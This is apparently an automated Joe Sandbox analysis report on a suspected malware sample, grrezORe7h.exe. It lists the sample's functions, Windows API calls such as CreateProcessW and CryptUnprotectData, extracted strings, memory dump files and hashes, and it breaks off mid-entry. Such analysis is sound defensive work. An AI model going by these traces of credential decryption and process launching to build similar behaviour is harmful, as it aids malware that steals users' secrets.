CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C

Function 00405B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 00405AC2
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 00405B6A
GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3081826266
Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD

Function 00405735 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
CloseHandle.KERNEL32(0040A300), ref: 0040576B

Strings

Error launching installer, xrefs: 00405748

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78

Function 00403809 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
GlobalFree.KERNEL32(?), ref: 0040382A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403809

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8

Function 00405A55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\grrezORe7h.exe,C:\Users\user\Desktop\grrezORe7h.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\grrezORe7h.exe,C:\Users\user\Desktop\grrezORe7h.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B

Strings

C:\Users\user\Desktop, xrefs: 00405A55

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Function 00405B8F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

Memory Dump Source

Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

Analysis Process: grrezORe7h.exePID: 7776, Parent PID: 7344COMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.4%
Total number of Nodes:	246
Total number of Limit Nodes:	18

Executed Functions

Function 377DD6C1 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$z~7, xrefs: 377DDA20
<06, xrefs: 377DDAD0
$z~7, xrefs: 377DD76E
$z~7, xrefs: 377DDA14
$z~7, xrefs: 377DD762

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: $z~7$$z~7$$z~7$$z~7$<06
API String ID: 0-181884487
Opcode ID: f5abe977f59d581b98bd789ca2faee960ad2e0d9ac4c01d0b66f780aa6f217c0
Instruction ID: 14127c403d11c3e5f208821c6ea9dcfb867871a65f70296bda4c31557c8d53ba
Opcode Fuzzy Hash: f5abe977f59d581b98bd789ca2faee960ad2e0d9ac4c01d0b66f780aa6f217c0
Instruction Fuzzy Hash: 6FD12B74A00305DFEB04DFA5C848BADBBF2BF85314F15855AE409BF2A5DB74A945CB80

Function 00155F90 Relevance: 8.0, Strings: 6, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(odq, xrefs: 00156505
(odq, xrefs: 001561E8
,hq, xrefs: 00156252
(odq, xrefs: 001561DA
dKY4pKY4KY4, xrefs: 00156513
,hq, xrefs: 00156260

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID: (odq$(odq$(odq$,hq$,hq$dKY4pKY4KY4
API String ID: 0-798548428
Opcode ID: 14990d93c2fbc1e6b4a9faa39d05ae4d3a55a3c862a5b5cb6352f354ff0b9e16
Instruction ID: f17bc1c7c10955147f39544b733ef583fd8d3bcf17e57ca09706a25cc36f3326
Opcode Fuzzy Hash: 14990d93c2fbc1e6b4a9faa39d05ae4d3a55a3c862a5b5cb6352f354ff0b9e16
Instruction Fuzzy Hash: C5124130A00219DFCB14CF69C994AAEBBF2FF99316F958059E8159F261DB30DD85CB90

Function 00158DA0 Relevance: 7.4, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

(odq, xrefs: 001594D8
4'dq, xrefs: 00158DC4
pKY4KY4, xrefs: 00158E3C, 00158F5E
4'dq, xrefs: 00159AD3
4'dq, xrefs: 00158ECC

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID: (odq$4'dq$4'dq$4'dq$pKY4KY4
API String ID: 0-4235713360
Opcode ID: c6fc89969412a4c96e27a2d50df9b424ae1bc6bfd4197f3ea8528892f05b4ea9
Instruction ID: eb41e2ce9949e8b034ae201831331f595d043d271738934cbd220b494c193a5c
Opcode Fuzzy Hash: c6fc89969412a4c96e27a2d50df9b424ae1bc6bfd4197f3ea8528892f05b4ea9
Instruction Fuzzy Hash: CAA26E70A04219DFCB15CF68C994AAEBBF2BF88301F158559E815DF2A1D730ED85CBA1

Function 00154328 Relevance: 6.4, Strings: 5, Instructions: 193
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjGp, xrefs: 0015452E
PHdq, xrefs: 001545A1
LjGp, xrefs: 00154518
0oGp, xrefs: 001543AA
PHdq, xrefs: 00154590

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID: 0oGp$LjGp$LjGp$PHdq$PHdq
API String ID: 0-1273542581
Opcode ID: 5dc54349e1bbbb82a27392d6e47cc518c1d0ea8de78ce57c1ab5aac245a10481
Instruction ID: fa1c8db990449e71e943d044591d2dd33cb74943f8c1180ece9dcacefae0522e
Opcode Fuzzy Hash: 5dc54349e1bbbb82a27392d6e47cc518c1d0ea8de78ce57c1ab5aac245a10481
Instruction Fuzzy Hash: 4591E774E00218DFDB14CFA9D884A9DBBF2BF89305F14D06AE819AB365DB349985CF50

Function 377DE7C8 Relevance: 2.0, Strings: 1, Instructions: 764COMMON

Download Yara Rule

Strings

Tedq, xrefs: 377DF17D

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: Tedq
API String ID: 0-228892971
Opcode ID: fdbbdfa900acdb892edd6d4d64ed6d30f563e92b814146d10f582e64d9584a58
Instruction ID: ec4800ec6d4f1dcb3780f304b5b345552f8008bb7e5c9e2ef59f7c435e8710bc
Opcode Fuzzy Hash: fdbbdfa900acdb892edd6d4d64ed6d30f563e92b814146d10f582e64d9584a58
Instruction Fuzzy Hash: 1E82C574A10268CFDB65DF64C954BADB7B2FB89301F1091EAE90967350CB35AE81DF40

Function 373ABDF0 Relevance: 2.0, Strings: 1, Instructions: 758COMMON

Download Yara Rule

Strings

Tedq, xrefs: 373AC796

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: Tedq
API String ID: 0-228892971
Opcode ID: 34d0dbbaba3d2500d22a393f694d61f8dfb87cba8f34b0df99db502ce3b389e7
Instruction ID: 474fc11d77876bd22e3a429c8297f37773a0990b24ec96f900ec058f6aa7e500
Opcode Fuzzy Hash: 34d0dbbaba3d2500d22a393f694d61f8dfb87cba8f34b0df99db502ce3b389e7
Instruction Fuzzy Hash: 9A72C474A10268CFDB65DF64C954BADB7B2FB89301F1090EAE90967360CB35AE81DF50

Function 36ECD9D9 Relevance: 1.6, APIs: 1, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000039,?,00000000,?,?,?,?), ref: 36ECDA45

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 0a10ad1a6739e58f0e415b86e952178d8d61d16483922d7245b11c2b29f51fb4
Instruction ID: 41ce53ed6a6a44c41fe6e40ecae65de43c4db9739315e45eb0c0d03a33772b23
Opcode Fuzzy Hash: 0a10ad1a6739e58f0e415b86e952178d8d61d16483922d7245b11c2b29f51fb4
Instruction Fuzzy Hash: FC1167B68003499FCB10CF99C905BDEBFF5EF48320F148419E658A7211C739A554DFA5

Function 36ECD1EC Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000039,?,00000000,?,?,?,?), ref: 36ECDA45

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 5a942aa1d62fb3fca38941458b984cf45a0c040891040083f944c1a28cd10b74
Instruction ID: cd638388134efd8c8873fe2d1ad90febae57fcc9dbcf5e966599ddb502f7debc
Opcode Fuzzy Hash: 5a942aa1d62fb3fca38941458b984cf45a0c040891040083f944c1a28cd10b74
Instruction Fuzzy Hash: 001159B68003499FDB10CF99C905BEEBFF4EB48320F108419E658A7211C735A954DFA5

Function 36EC0C28 Relevance: 1.5, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

6, xrefs: 36EC0C99

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-3617711204
Opcode ID: 05c7a396b5ddd75a31da297e305d1bc02b20ab1e634879fbaf299c6d9c54fceb
Instruction ID: f6413d518e68fb5c12795517caa3161046abb4b7d26edb65b15fc270670221f6
Opcode Fuzzy Hash: 05c7a396b5ddd75a31da297e305d1bc02b20ab1e634879fbaf299c6d9c54fceb
Instruction Fuzzy Hash: 66A10474D01208CFDB10DFA9C954BDDBBB1BF88315F208269E408AB391DB759989CF55

Function 373A9D10 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

0^07, xrefs: 373A9FF0

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: 0^07
API String ID: 0-3501635579
Opcode ID: 2271c38fa1094525adb57b338a82ed8f8d7ee4a7ea9c67e54b64688c63fadec5
Instruction ID: adc219e6c966d9b88f00cf71c2522d5efb0a8b02baad811960a7c4cc7ce1ccb9
Opcode Fuzzy Hash: 2271c38fa1094525adb57b338a82ed8f8d7ee4a7ea9c67e54b64688c63fadec5
Instruction Fuzzy Hash: 3BA1A1B5E012188FEB54CF6AC945B9EBBF2AF89300F14C0AAD40DB7251DB349A85CF51

Function 373AA360 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

0^07, xrefs: 373AA640

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: 0^07
API String ID: 0-3501635579
Opcode ID: 6a95a1da22367fa62f9470fe6c6829368217fb417d508b7e46137cdf78bc7425
Instruction ID: f3ef921763154f587372818b905c78aaf46b3ad4c4aa3b700d1c51ba9bdf3db1
Opcode Fuzzy Hash: 6a95a1da22367fa62f9470fe6c6829368217fb417d508b7e46137cdf78bc7425
Instruction Fuzzy Hash: A9A1A0B5E012288FEB54CF6AC985B9DBBF2AF89300F10C0AAD40DA7255DB345A85CF51

Function 373A96C8 Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

0^07, xrefs: 373A99A4

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: 0^07
API String ID: 0-3501635579
Opcode ID: cd4ddeb92470c81592e1d02663f554e956330c24f31785ba4d1b4ddc9862e5f2
Instruction ID: aed515c7e5f9617e685519d00aef51a2290f272b5530904f774c49236e921c9a
Opcode Fuzzy Hash: cd4ddeb92470c81592e1d02663f554e956330c24f31785ba4d1b4ddc9862e5f2
Instruction Fuzzy Hash: 8BA190B4E012188FEB58CF6AC945B9DBBF2AF89300F14D1AAD40DB7255DB349A85CF11

Function 373AA9B0 Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

0^07, xrefs: 373AAC8B

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: 0^07
API String ID: 0-3501635579
Opcode ID: 22ae40dd9c0b222fdf74016ec4b2760e0ec8b39db137628143ff9812c21bbba7
Instruction ID: ac1dea7affc0810692ceb911fc2fa1fa755b1ae6341d35d76a1291b88c7ab51c
Opcode Fuzzy Hash: 22ae40dd9c0b222fdf74016ec4b2760e0ec8b39db137628143ff9812c21bbba7
Instruction Fuzzy Hash: CDA1B2B5E012188FEB54CF6AC984B9DBBF2AF89300F10C1AAD40DB7255DB345A85CF11

Function 36EC0C1C Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

6, xrefs: 36EC0C99

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-3617711204
Opcode ID: d2e972211bb4e830c1f706f350ecdfc0144c9a16b7da9a52944cb80829b1c0a3
